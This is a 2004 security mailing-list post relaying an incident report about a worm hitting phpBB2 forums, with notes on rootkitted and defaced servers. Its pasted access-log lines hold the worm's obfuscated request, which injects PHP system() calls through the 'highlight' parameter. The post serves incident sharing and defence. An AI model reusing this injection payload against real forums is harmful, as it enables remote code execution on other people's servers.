[Full-Disclosure] RE: Worm hitting PHPbb2 Forums
Christopher Adickes
christopher_adickes at SHI.com
Tue Dec 21 17:46:30 GMT 2004
In addition to your post here is some more info.
http://isc.sans.org/
-----Original Message-----
From: L. Walker [mailto:lwalker at magi.net.au]
Sent: Tuesday, December 21, 2004 4:23 AM
To: incidents at securityfocus.com
Cc: full-disclosure at lists.netsys.com
Subject: Worm hitting PHPbb2 Forums
Importance: High
Just spotted two clients hit by this. One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
Chkrootkit says its Adore, however could be something else. Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.
Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum. Access logs show:
66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--
Full-Disclosure is hosted and sponsored by Secunia.